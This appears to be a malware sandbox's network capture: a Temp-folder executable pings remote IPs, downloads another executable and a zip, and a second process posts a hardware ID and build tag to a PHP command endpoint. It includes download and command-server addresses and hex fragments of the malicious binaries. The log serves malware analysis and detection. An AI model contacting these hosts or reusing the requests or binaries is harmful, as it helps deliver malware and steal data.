Apr 26, 2024 17:11:00.045553923 CEST	1289	IN	Data Raw: a3 b0 4d 04 04 ff 75 08 ff 15 a4 10 41 00 8d 4b 04 89 03 51 ff 15 a4 10 41 00 a3 ac 4d 04 04 8b 45 08 eb 02 33 c0 5f 5e 5b 8b e5 5d c3 55 8b ec ff 75 08 e8 f9 fe ff ff f7 d8 59 1b c0 f7 d8 48 5d c3 8b 0d 98 8c 41 00 33 c0 83 c9 01 39 0d 28 73 45 Data Ascii: MuAKQAME3_^[]UuYH]A39(sEjhoA'83}39Eu<aZ+ Pj+YY}E+ P;YEPWu,+ P;}+ PV:E7}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49709	185.172.128.90	80	3808	C:\Users\user\AppData\Local\Temp\i1.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 17:11:01.922118902 CEST	207	OUT	GET /cpa/ping.php?substr=one&s=ab&sub=2838 HTTP/1.1 Host: 185.172.128.90 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Apr 26, 2024 17:11:03.787442923 CEST	148	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 15:11:02 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49711	185.172.128.228	80	3808	C:\Users\user\AppData\Local\Temp\i1.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 17:11:04.134473085 CEST	190	OUT	GET /ping.php?substr=one HTTP/1.1 Host: 185.172.128.228 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Apr 26, 2024 17:11:04.374912024 CEST	147	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 15:11:04 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49712	185.172.128.59	80	3808	C:\Users\user\AppData\Local\Temp\i1.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 17:11:05.719480991 CEST	181	OUT	GET /syncUpd.exe HTTP/1.1 Host: 185.172.128.59 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Apr 26, 2024 17:11:05.960664034 CEST	1289	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 15:11:05 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Fri, 26 Apr 2024 15:00:01 GMT ETag: "4a800-6170128792a26" Accept-Ranges: bytes Content-Length: 305152 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 76 3c 9d 55 32 5d f3 06 32 5d f3 06 32 5d f3 06 3f 0f 2c 06 2e 5d f3 06 3f 0f 13 06 4c 5d f3 06 3f 0f 12 06 1c 5d f3 06 3b 25 60 06 31 5d f3 06 32 5d f2 06 5e 5d f3 06 87 c3 16 06 33 5d f3 06 3f 0f 28 06 33 5d f3 06 87 c3 2d 06 33 5d f3 06 52 69 63 68 32 5d f3 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 11 df 3d 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0c 00 00 00 01 00 00 80 c2 03 00 00 00 00 47 43 00 00 00 10 00 00 00 10 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 b0 c3 03 00 04 00 00 50 52 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a4 73 01 00 28 00 00 00 00 20 c2 03 70 6a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 c3 03 64 13 00 00 f0 11 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 68 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 05 ff 00 00 00 10 00 00 00 00 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 32 6c 00 00 00 10 01 00 00 6e 00 00 00 04 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a8 90 c0 03 00 80 01 00 00 b6 01 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 70 6a 01 00 00 20 c2 03 00 6c 01 00 00 28 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 64 13 00 00 00 90 c3 03 00 14 00 00 00 94 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 cc ff 01 04 e8 75 02 00 00 68 fb 0e Data Ascii: MZ@!L!This program cannot be run in DOS mode.$v<U2]2]2]?,.]?L]?];%`1]2]^]3]?(3]-3]Rich2]PEL=eGC@PRs( pjd8h@\|.text `.rdata2ln@@.datar@.rsrcpj l(@@.relocd@Buh
Apr 26, 2024 17:11:05.960731983 CEST	1289	IN	Data Raw: 41 00 e8 3f 2d 00 00 59 c3 b9 d4 ff 01 04 e8 c8 02 00 00 68 f1 0e 41 00 e8 29 2d 00 00 59 c3 b9 c0 ff 01 04 e8 1f 03 00 00 68 e7 0e 41 00 e8 13 2d 00 00 59 c3 6a 00 b9 c8 ff 01 04 e8 15 01 00 00 c3 6a 00 b9 bc ff 01 04 e8 08 01 00 00 c3 6a 00 b9 Data Ascii: A?-YhA)-YhA-YjjjjUQQL$$X]E]UQQQQ$$]EYY]UVEPUD5A^]D5AUVEtV
Apr 26, 2024 17:11:05.960809946 CEST	1289	IN	Data Raw: 00 53 53 ff 15 2c 10 41 00 8d 45 c8 50 ff 15 0c 10 41 00 53 53 53 ff 15 28 10 41 00 8d 85 b0 fb ff ff 50 53 ff 15 98 10 41 00 53 53 ff 15 94 10 41 00 8d 45 c4 50 53 8d 45 b0 50 53 ff 15 3c 10 41 00 53 53 53 53 ff 15 50 10 41 00 8b 45 f8 8b 0d b0 Data Ascii: SS,AEPASSS(APSASSAEPSEPS<ASSSSPAE+}uSAEEE]EEEEEEMEEEEMU3E3U:UGaUNt]MuE~_^[]V5W=t
Apr 26, 2024 17:11:05.960901022 CEST	1289	IN	Data Raw: b4 ab 2f f7 64 24 14 8b 44 24 14 b8 1e 18 24 33 f7 64 24 10 8b 44 24 10 b8 f1 ae 8e 20 f7 64 24 10 8b 44 24 10 81 44 24 08 0d 33 ae 67 81 44 24 14 94 fb 09 11 b8 d3 ae 4e 14 f7 64 24 10 8b 44 24 10 81 6c 24 20 7c 79 96 48 81 6c 24 0c d0 4e a9 17 Data Ascii: /d$D$$3d$D$ d$D$D$3gD$Nd$D$l$ \|yHl$Nl$}7d$D$l$Iip0yd$D$oS@d$D$D$axl$#MD$$fvD$4R5U+d$D$l$ukmWebd$4D$4l$7D$8e6D$(>yuD$,V_GD$<?
Apr 26, 2024 17:11:05.960920095 CEST	1289	IN	Data Raw: 57 e8 5a 01 00 00 8b ce 84 c0 74 15 ff 75 0c e8 a6 01 00 00 2b f8 8b ce 57 56 e8 71 fe ff ff eb 2e 6a 00 ff 75 0c e8 cf 00 00 00 84 c0 74 1e ff 75 0c 8b ce 57 e8 80 01 00 00 50 e8 c4 f1 ff ff 83 c4 0c 8b ce ff 75 0c e8 84 00 00 00 8b c6 5f 5e 5d Data Ascii: WZtu+WVq.jutuWPu_^]UEV9FrPh^]&USVW}^;rCM+;wW%t(U++QQPaS_^[]UQVuEPEqP;YY
Apr 26, 2024 17:11:05.960997105 CEST	1289	IN	Data Raw: 83 f9 ff 77 0b 51 e8 ba 1e 00 00 59 85 c0 75 05 e9 cb 02 00 00 c3 6a 0c e8 a8 1e 00 00 59 85 c0 0f 84 ba 02 00 00 c3 56 8b f1 57 8b 7e 04 e8 25 00 00 00 83 ca ff 2b d7 03 c2 83 f8 01 72 0b 8d 47 01 5f 89 46 04 5e c2 04 00 68 b4 68 41 00 e8 bd 02 Data Ascii: wQYujYVW~%+rG_F^hhAUUUUVuueMPJPG^]UVWMPV;_^]UMVPVD^]UM\|UPR
Apr 26, 2024 17:11:05.961107016 CEST	1289	IN	Data Raw: 66 0f 6f e0 66 0f 3a 0f c2 04 66 0f 7f 47 10 66 0f 6f cd 66 0f 3a 0f ec 04 66 0f 7f 6f 20 8d 7f 30 7d b7 8d 76 04 83 f9 10 7c 13 f3 0f 6f 0e 83 e9 10 8d 76 10 66 0f 7f 0f 8d 7f 10 eb e8 0f ba e1 02 73 0d 8b 06 83 e9 04 8d 76 04 89 07 8d 7f 04 0f Data Ascii: fof:fGfof:fo 0}v\|ovfsvs~vf@ur$@r$)@$@$l@)@(@L@#FGFGr$@I#
Apr 26, 2024 17:11:05.961210966 CEST	1289	IN	Data Raw: e8 a8 00 00 00 8b c6 5e 5d c2 04 00 55 8b ec 8b 45 08 c7 01 34 20 41 00 8b 00 89 41 04 8b c1 c6 41 08 00 5d c2 08 00 55 8b ec 56 ff 75 08 8b f1 83 66 04 00 c7 06 34 20 41 00 c6 46 08 00 e8 12 00 00 00 8b c6 5e 5d c2 04 00 c7 01 34 20 41 00 e9 96 Data Ascii: ^]UE4 AAA]UVuf4 AF^]4 AUVW};ttw5GF_^]UV4 AREtVxY^]U}St-Wu[xWCYYtuWP!C_[]V~t
Apr 26, 2024 17:11:05.961277962 CEST	1289	IN	Data Raw: d1 88 47 03 83 ee 01 c1 e9 02 83 ef 01 83 f9 08 72 b2 fd f3 a5 fc ff 24 95 34 34 40 00 8d 49 00 8a 46 03 23 d1 88 47 03 8a 46 02 c1 e9 02 88 47 02 83 ee 02 83 ef 02 83 f9 08 72 88 fd f3 a5 fc ff 24 95 34 34 40 00 90 8a 46 03 23 d1 88 47 03 8a 46 Data Ascii: Gr$44@IF#GFGr$44@F#GFGFGV$44@I3@3@3@4@4@4@4@+4@DDDDDDDDDDDDDD$44@D4@L4@\4@
Apr 26, 2024 17:11:05.961313963 CEST	1289	IN	Data Raw: 16 83 c8 02 89 41 70 c6 46 0c 01 eb 0a 8b 01 89 06 8b 41 04 89 46 04 8b c6 5e 5d c2 04 00 55 8b ec 83 ec 10 56 57 8b 7d 08 85 ff 0f 84 83 00 00 00 80 3f 00 74 7e 8b 75 0c 85 f6 74 77 ff 75 10 8d 4d f0 e8 4e ff ff ff 8d 45 f0 50 0f b6 07 50 e8 07 Data Ascii: ApFAF^]UVW}?t~utwuMNEPP,YEYt*xt~<;pt\|7jjptWjpHAt Eptjj3FVWjpHAu}tMap3_^]U=<CuhAjuuB]W\|$n
Apr 26, 2024 17:11:06.201344967 CEST	1289	IN	Data Raw: f7 d8 59 1b c0 f7 d8 48 5d c3 8b 0d 98 8c 41 00 33 c0 83 c9 01 39 0d 08 36 43 00 0f 94 c0 c3 6a 0c 68 18 6f 41 00 e8 27 38 00 00 33 ff 89 7d e4 33 c0 39 45 08 0f 95 c0 85 c0 75 15 e8 b6 12 00 00 c7 00 16 00 00 00 e8 3c 12 00 00 83 c8 ff eb 61 e8 Data Ascii: YH]A396CjhoA'83}39Eu<aZ+ Pj+YY}E+ P;YEPWu,+ P;}+ PV:E7}* Pj+YYjh8oAx73]3}u

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49713	176.97.76.106	80	3808	C:\Users\user\AppData\Local\Temp\i1.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 17:11:07.945858002 CEST	185	OUT	GET /1/Package.zip HTTP/1.1 Host: note.padd.cn.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Apr 26, 2024 17:11:08.214071035 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Apr 2024 14:55:49 GMT Content-Type: application/zip Content-Length: 3884863 Last-Modified: Wed, 24 Apr 2024 05:45:46 GMT Connection: keep-alive ETag: "66289c8a-3b473f" Strict-Transport-Security: max-age=31536000 Accept-Ranges: bytes Data Raw: 50 4b 03 04 14 00 00 00 08 00 0b 3f 98 58 ef da 8c 80 dd c7 12 00 09 49 14 00 09 00 00 00 62 75 6e 63 68 2e 64 61 74 5c 5d 87 a2 aa 3a 16 cd af 89 8a 20 22 2a 16 10 05 54 ec 15 1b fa f7 b3 d6 4e 3c 77 66 bc ef 58 20 24 3b bb 65 b7 e4 29 a5 ac 9e af 7c 75 5d 2b bc a6 ca 55 2a 56 ea a9 7e af 81 db 9b bd d4 66 da 52 6a 65 f7 f5 b5 1d fe 1a b5 40 f5 66 f8 72 c0 df 56 0d 95 da 17 4a 2d f0 23 55 bd e7 b3 b7 bc 2a b5 de ab 3d ba 54 13 f5 45 13 35 cc 94 5a fa e3 83 aa 26 b5 9e 7a cf 95 fa f4 27 18 6b a2 8e 25 9e cb 4a 65 a9 cb 85 03 dc d4 5b 35 1e e8 cd c6 8f f7 50 c5 db 85 42 7f b5 19 40 05 ac f3 07 2e bf d4 e9 96 a8 47 eb fc 7a 5b 2a 8f 2d 42 31 e2 c3 ce d0 4a 7a 23 0c a9 ce d7 25 de bb 4a b1 fb a6 6a 06 0f d5 57 f5 a4 0e 18 af b5 00 1d 3e 36 32 eb 6a 4b 28 95 bc 0d d4 f1 a3 1a a1 9a c4 a5 02 84 45 b4 54 c9 51 7d d6 6a dd 5f 49 8b 8e 52 ee 54 45 6a a3 3e d2 f1 8b 4f c6 2a 99 3a 4a 25 6f a5 da aa 18 02 8b ec aa a6 b2 60 82 66 2b 4f a9 d6 1c 57 3e 15 87 c0 a3 dd 53 8e 49 4e 43 f5 6d ab 36 be a9 7c 77 51 bb 78 6b ba 4b fa eb fb e5 c8 6f bd 44 1d da 82 f4 13 3a ec 6e 34 01 be 0b f5 50 3e be 84 2a 4d 86 5f 7c 1b a9 8d 50 a7 52 40 9d 67 57 00 90 af 6b 98 90 58 dd c1 01 4d 62 4d d5 0b 9a 17 00 48 0d e6 07 f5 11 e0 eb 20 0c be a0 97 c5 23 6f 05 43 43 fb 21 da b5 c6 fd 31 21 52 f5 67 a2 f2 0a f8 51 63 20 22 50 0d 95 ab c2 51 87 33 a0 48 d0 42 f3 46 e7 7c 1d c6 aa 91 29 97 e0 bd ea cf c6 f8 a9 ae 13 dc f0 40 81 bf 57 f3 a8 36 9f a1 5a 03 15 37 90 39 e0 b5 ed a2 af b6 fc ea 91 64 27 60 5f bf 36 c0 7a 72 25 61 c7 c3 b6 85 1b 00 2a 1e 37 00 2c 2e 92 dd 6c 0c e4 a8 8e a3 2e 68 cb 76 9f f4 18 a0 8b e3 50 0d 4f 05 66 e1 8d 15 21 f4 fd 59 b7 f3 23 b3 b0 59 81 37 cd c2 67 d5 d8 b9 76 3d c4 f0 6b 7f a3 00 f0 4a d5 f9 d4 4e 23 5c a5 35 cc 93 d7 c1 d2 c2 a3 5d cc a7 ca f8 ad 1f b6 3c cf 56 47 55 00 7e 99 cb 9d a8 c7 2c bd d1 58 1e 6f 9b 6b 2e 80 23 8f ce 3f 76 a1 16 25 88 30 ac 2b f2 f9 8d 6d d8 28 6d c5 9e ea 61 68 be 4a 47 3e 16 00 83 fd d8 6d f7 d1 56 99 9a 0c dd f7 d3 6b 62 c0 f3 9a f3 42 ab 6a 58 a1 17 bc 56 24 70 92 a9 93 20 ce 95 c7 3f 9b 3c d8 aa f7 16 bd 5e cf 1d cc 25 4b 41 3d 30 5c be 28 ba c3 09 a6 f8 b8 51 ac 6c 3e 8c 3b 78 ad db 23 57 d5 96 40 40 1b 74 49 55 20 1d a6 f3 51 1b a0 8c 08 9a a5 16 97 14 c2 c0 d9 90 19 2f 65 c9 99 37 45 77 c4 95 f5 7d 68 dc e2 5e 4e e2 02 c5 20 89 9e 18 bb c2 8f 91 f9 de 2b 95 e6 fb 0e c8 b2 c7 0f 8d a9 62 52 7a ca ea f7 1a e3 8b 0a 81 9a 86 32 72 a5 66 1e de 84 75 27 6f bc f1 73 1c 7d 31 05 f4 b8 6a c5 7b 10 27 25 b5 c0 19 b5 85 1a b6 3f ce 81 8d 5a 03 fc 4d d5 00 d3 d4 ca ae 39 2e 7c 50 be dd 57 a3 6f a9 d6 f9 63 a0 92 d1 9b 33 c0 00 ed 15 48 5c 87 34 95 a2 42 8a c6 a3 c0 dc df df 3b 31 34 d1 a2 36 35 93 51 33 00 85 b9 f7 32 34 24 8b ec 84 e0 32 28 87 9a 39 6a c5 df 17 d5 9c fd f8 21 c1 24 f7 ea 96 9c 3c 3c 0f 86 c4 8d da 50 23 62 d7 15 4c 6a a1 44 97 76 47 c4 2b b4 7d af 54 82 03 36 74 52 d5 17 62 d9 22 e9 c4 9b 6f 84 66 a5 87 ef 68 3e cd 2a b9 86 e7 ac 89 1a fa c7 99 5a 0f 1d 35 99 28 dd d7 19 f0 5d a4 8f a2 90 d9 1c a7 e0 a5 Data Ascii: PK?XIbunch.dat\]: "TN<wfX $;e)\|u]+UV~fRje@frVJ-#U=TE5Z&z'k%Je[5PB@.Gz[-B1Jz#%JjW>62jK(ETQ}j_IRTEj>O:J%o`f+OW>SINCm6\|wQxkKoD:n4P>M_\|PR@gWkXMbMH #oCC!1!RgQc "PQ3HBF\|)@W6Z79d'`_6zr%a7,.l.hvPOf!Y#Y7gv=kJN#\5]<VGU~,Xok.#?v%0+m(mahJG>mVkbBjXV$p ?<^%KA=0\(Ql>;x#W@@tIU Q/e7Ew}h^N +bRz2rfu'os}1j{'%?ZM9.\|PWoc3H\4B;1465Q324$2(9j!$<<P#bLjDvG+}T6tRb"ofh>Z5(]
Apr 26, 2024 17:11:08.214092016 CEST	1289	IN	Data Raw: 9e eb 93 5a 97 53 4c ea 1d 6a 03 c2 62 55 39 25 62 42 ae d3 fa 42 88 fb 27 a8 43 b2 49 31 c3 44 5b ca ba aa 00 34 12 88 ca b9 5f 02 ba 75 fa 98 e6 aa 99 b6 d8 3a 3a ef 40 87 6c d7 24 a1 82 22 2e a6 95 3a 3b ba a7 69 a9 6a a6 7f 61 eb 16 d7 24 8a Data Ascii: ZSLjbU9%bBB'CI1D[4_u::@l$".:;ija$(i2_NXj&4Uh{"~2ReWhP<U0 ~pSM4G?wNx/OVcyb:kW!b'BF*s}f{'L)cz9A0`$zTN1
Apr 26, 2024 17:11:08.214150906 CEST	1289	IN	Data Raw: 91 e8 d4 4f 64 fd 25 3f c7 5c b6 02 a1 e3 62 97 c5 b4 36 30 5c 0f 0b a4 95 e2 4b f3 20 8b ae 74 0a d8 6f 64 c9 cd 0f 89 fb de 6f fc ee 08 20 10 e8 db 99 62 ec 25 9c 25 99 27 b2 b4 24 0c f1 b9 97 af 0f 68 ef 8d 2f cf 5f 68 0e ba fe 1c 0c ff 7d 3c Data Ascii: Od%?\b60\K todo b%%'$h/_h}<?\Z7V6]m!Nm(H\|Im8zn2jk)jPE/d\_r_"R:j4J\CsyuXx3tS9V;,.\|j\[S
Apr 26, 2024 17:11:08.214274883 CEST	1289	IN	Data Raw: 16 d3 e9 46 6e ba ef 9e 3e ac 87 cb 48 1b 8b 1b e2 6e 6b f7 dd 08 4c 39 c4 34 5e c7 86 4d 0e 9b cf 71 d7 69 4c 55 b7 78 9e 89 67 31 89 95 56 76 27 82 62 77 47 32 48 54 a5 75 d1 bb f3 1d 92 03 63 60 f8 fd e3 ff 91 d6 3d dd 13 b9 b9 73 37 31 97 f5 Data Ascii: Fn>HnkL94^MqiLUxg1Vv'bwG2HTuc`=s71(g{qT-#ulNjR:Om@,kfCgsl WEO1lj$z?kLUhPA8XvqbP~iwY2.y\W=1Wq0O}Rl
Apr 26, 2024 17:11:08.214365959 CEST	1289	IN	Data Raw: e1 8d 3e ea ea fb 97 aa 06 3c ad 0a 8f f7 90 2a ca 3a 58 17 34 2e 60 db f4 ce 19 bb 1b 3d d4 b1 15 8a 22 f2 ef 2b 50 21 c1 04 c8 60 9f ba 70 95 bc 1d 95 3b 4b 05 45 2e 89 7c 18 6c 94 7f c0 2f de 2f b4 4e 9c b6 90 6d 9c b4 d5 9d 0d c4 f0 bf c7 9a Data Ascii: ><:X4.`="+P!`p;KE.\|l//Nmnkk&z'74<RY>y=O+MDcSo@x 9c;>-{];@G\{?];[Peqpq=Iqa5`D_AP_GU3[_\|gYA#8
Apr 26, 2024 17:11:08.214457035 CEST	1289	IN	Data Raw: 03 fc cc 1a 92 a0 9d cc 8c 39 c4 b5 34 53 ef 8f ac 49 03 e5 36 a9 6a e7 87 3c e7 54 4e cb 6d 1f d6 0d 6f ed c9 9e e1 e6 ec 91 bf 6b 6a 91 3e cb f1 02 2a e9 eb ac d4 5f ba 11 a4 85 50 ae f5 fa 37 21 1c 57 76 b7 7d 21 ec 4b 32 0f 40 c9 12 33 1e 43 Data Ascii: 94SI6j<TNmokj>_P7!Wv}!K2@3Cs-<HIo5 Q0V?4v^i2D5v$ip^`RLK$.0 ^wS~W _h:JIEE;/?j8-
Apr 26, 2024 17:11:08.214555025 CEST	1289	IN	Data Raw: 23 92 12 a8 ed ec 3a 23 5c c7 33 cd bc 07 1c 47 cf e6 44 fb 2d e3 53 62 a2 58 17 50 1f ac 0c 92 e1 77 b6 56 b3 ba 3a 06 37 24 d5 e2 4d 74 20 4a 83 6e c1 29 9f 67 8b c1 47 5d a4 54 73 8e aa ea 13 c3 23 cc 3c 18 d3 39 ed 82 06 8b b6 ee 95 3b 16 f8 Data Ascii: #:#\3GD-SbXPwV:7$Mt Jn)gG]Ts#<9;1xr5:StLE8:ihFtT%X(]d-nS(W!(.vwpv.[E%AdOZguvYHGv:u\6sEaXu6;\.*
Apr 26, 2024 17:11:08.214601994 CEST	1289	IN	Data Raw: 26 77 2e 9f 11 1f dc c1 ba f5 4f a2 64 c7 94 86 7a 5b 8f bd 8a d0 3a 30 6e e3 7e 84 38 e6 10 7d 0d c4 e3 5d c7 eb b1 98 15 a5 59 c1 e0 e0 a1 be 3e 69 cf ba 61 6a 92 e0 3b 99 7f 83 14 9a 8b f3 12 5f 4b 28 4a 28 cd c3 63 81 59 6e ed d7 e1 53 53 4d Data Ascii: &w.Odz[:0n~8}]Y>iaj;_K(J(cYnSSM2UXf2&3mtvaj8;X!_/dlI8u1J/919FI41iD:5-^kq).ptGO4B?
Apr 26, 2024 17:11:08.214684963 CEST	1289	IN	Data Raw: 00 cc 0a 32 de db 68 03 5c d7 9a 0f ef b0 e7 c6 b2 54 5e 80 d7 df 8b ec ce 42 f0 54 5a fe fc 02 eb 50 7b b8 40 bb a5 87 16 e1 d3 25 f1 f3 d0 bf ac f8 7b 4a 2e d1 42 f0 9a cc 7c 6e fe 24 14 e7 3d ea fe 36 1b 69 9b 63 f8 63 36 25 8e 5a fd b3 78 eb Data Ascii: 2h\T^BTZP{@%{J.B\|n$=6icc6%Zxn1#]\|D;Scv\f-!jID\$[V=!k%cpOSvu'p.B1z3z+L:4Y7U'g`
Apr 26, 2024 17:11:08.214787960 CEST	1289	IN	Data Raw: 70 ec 91 9e 1a b6 f3 5f 25 dc f4 9b bb ac 07 63 42 0f 8f 1e 65 67 df 33 2d d4 fe c1 55 6c 20 fa 23 42 7c ce 66 ad 52 a3 fe 0a 1a 7e ae 37 c5 8c cc 51 67 6a f7 cd 70 5c d0 66 72 69 6f 08 57 5f 4e 81 f1 e9 c4 eb a2 a5 df f6 cc b5 e7 51 ae 56 b8 25 Data Ascii: p_%cBeg3-Ul #B\|fR~7Qgjp\frioW_NQV%#p&osj}(K^"ea/go6&v3\o{Mh3XqAOsrabEtU_P?a#sn9y3u@(T]hN5NPT#hM
Apr 26, 2024 17:11:08.478595018 CEST	1289	IN	Data Raw: db 4d 87 6f fe 6d d4 ff 76 19 6e e6 d5 95 f5 08 7f 96 68 9f cf a1 4b f3 42 8e 7e c5 60 5d fa 32 76 eb b8 3d e7 fe a6 b5 ef 88 7a 69 90 a1 07 6d 40 ca 4d ad 2f f1 0f 46 61 32 9a 7c 9c bf 64 11 6f b6 a4 1a b0 1d 9d 1d 76 3e e4 76 85 e0 ad ef 6b be Data Ascii: MomvnhKB~`]2v=zim@M/Fa2\|dov>vk3#qLj[G?&e<kl9SA/vS/DMLaNjF[3);<g2<pUyru{){N8gk{>\|=r2WRBL]+=K

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49714	185.172.128.76	80	5788	C:\Users\user\AppData\Local\Temp\u2xs.0.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 17:11:11.271187067 CEST	417	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BAAAAKJKJEBGHJKFHIDG Host: 185.172.128.76 Content-Length: 216 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 41 41 41 41 4b 4a 4b 4a 45 42 47 48 4a 4b 46 48 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 45 42 34 30 36 36 43 39 35 35 33 34 32 32 38 33 31 39 34 30 33 0d 0a 2d 2d 2d 2d 2d 2d 42 41 41 41 41 4b 4a 4b 4a 45 42 47 48 4a 4b 46 48 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 31 30 0d 0a 2d 2d 2d 2d 2d 2d 42 41 41 41 41 4b 4a 4b 4a 45 42 47 48 4a 4b 46 48 49 44 47 2d 2d 0d 0a Data Ascii: ------BAAAAKJKJEBGHJKFHIDGContent-Disposition: form-data; name="hwid"7EB4066C95534228319403------BAAAAKJKJEBGHJKFHIDGContent-Disposition: form-data; name="build"default10------BAAAAKJKJEBGHJKFHIDG--
Apr 26, 2024 17:11:11.838044882 CEST	347	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 15:11:11 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 152 Connection: keep-alive Vary: Accept-Encoding Data Raw: 59 6d 59 7a 4d 7a 4d 35 5a 44 42 6c 59 6a 6b 78 4e 6d 45 33 4f 44 51 35 59 6d 5a 69 4f 57 4e 6d 4d 7a 55 30 4e 7a 63 30 4f 47 46 6b 5a 6a 52 6d 4e 44 5a 6a 4e 6a 67 7a 4f 44 63 31 59 6a 6b 77 59 6a 59 32 4d 7a 51 77 4d 47 4e 69 5a 44 4a 6b 5a 44 67 33 4e 54 45 34 59 7a 4a 69 4e 44 49 79 66 47 68 6c 63 6a 64 6f 4e 44 68 79 66 47 56 79 4e 47 67 30 5a 54 68 79 4e 43 35 6d 61 57 78 6c 66 44 46 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 3d Data Ascii: 